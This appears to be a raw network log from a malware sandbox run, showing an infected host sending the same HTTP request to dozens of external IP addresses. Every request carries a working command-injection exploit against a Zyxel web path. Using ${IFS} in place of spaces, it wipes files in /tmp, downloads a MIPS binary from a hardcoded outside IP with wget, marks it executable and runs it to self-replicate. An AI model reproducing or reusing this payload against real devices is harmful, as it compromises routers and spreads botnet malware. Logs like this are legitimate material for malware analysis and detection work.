                                                Jan 29, 2024 07:07:53.458878994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5766192.168.2.2338602149.247.20.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.459558964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5767192.168.2.235893251.124.255.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.459587097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5768192.168.2.2355336186.201.120.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.459709883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5769192.168.2.2339386200.89.106.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.459763050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5770192.168.2.2332908124.113.49.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.459763050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5771192.168.2.2333552218.159.240.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.459763050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5772192.168.2.2353348130.157.213.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.459777117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5773192.168.2.2337028196.151.97.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.459841013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5774192.168.2.233555869.142.145.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.459857941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5775192.168.2.235895075.50.73.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.459901094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5776192.168.2.2357930144.100.39.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.459971905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5777192.168.2.2345756208.121.78.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.459992886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5778192.168.2.23339725.247.219.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.460038900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5779192.168.2.235825688.85.138.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.460084915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5780192.168.2.233466046.119.129.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.460112095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5781192.168.2.233360847.176.50.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.460170031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5782192.168.2.2355076159.64.78.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.460207939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5783192.168.2.2351230101.54.35.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.460232019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5784192.168.2.234617679.237.177.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.460284948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5785192.168.2.234610876.101.25.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.460318089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5786192.168.2.2347742116.15.228.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.460357904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5787192.168.2.2354450152.10.167.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.460386038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5788192.168.2.2358122137.220.115.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.460413933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5789192.168.2.2356654115.33.161.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.467777014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5790192.168.2.234594214.118.37.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.467807055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5791192.168.2.235684646.155.228.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.467848063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5792192.168.2.2345088170.14.41.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.467878103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5793192.168.2.2340408196.17.255.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.467933893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5794192.168.2.2334436220.237.132.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468007088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5795192.168.2.234969654.248.96.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468027115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5796192.168.2.235483898.41.32.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468045950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5797192.168.2.2360688155.174.179.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468091011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5798192.168.2.233827673.32.37.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468139887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5799192.168.2.233849497.105.237.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468163013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5800192.168.2.2347680200.97.43.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468216896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5801192.168.2.2342968194.228.71.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468252897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5802192.168.2.2336714186.104.32.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468300104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5803192.168.2.233825658.187.88.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468341112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5804192.168.2.2358738198.99.33.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468384981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5805192.168.2.2347056170.61.140.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468417883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5806192.168.2.2360984210.160.127.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468461037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5807192.168.2.234450050.238.91.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468483925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5808192.168.2.2354410210.100.161.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468543053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5809192.168.2.2354562133.187.92.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468555927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5810192.168.2.2355772115.245.110.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468592882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5811192.168.2.233567242.203.3.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468631983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5812192.168.2.2351098213.38.167.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468681097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5813192.168.2.2335564176.22.245.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468734026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5814192.168.2.2348574130.100.22.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468770027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5815192.168.2.2349130166.229.209.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468818903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5816192.168.2.2356542195.85.110.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468832970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5817192.168.2.233471482.133.106.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468859911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5818192.168.2.233439865.229.56.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468916893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5819192.168.2.2359856125.164.211.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.468945980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5820192.168.2.2342288181.109.241.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469007015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5821192.168.2.235938425.192.134.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469029903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5822192.168.2.2348602199.151.152.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469058037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5823192.168.2.234172846.110.182.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469096899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5824192.168.2.233815250.51.164.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469132900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5825192.168.2.2346434218.141.19.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469165087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5826192.168.2.2352648190.127.202.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469237089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5827192.168.2.2342720189.58.186.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469245911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5828192.168.2.235650871.56.84.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469283104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5829192.168.2.235597440.125.234.137443
                                                TimestampBytes transferredDirectionData
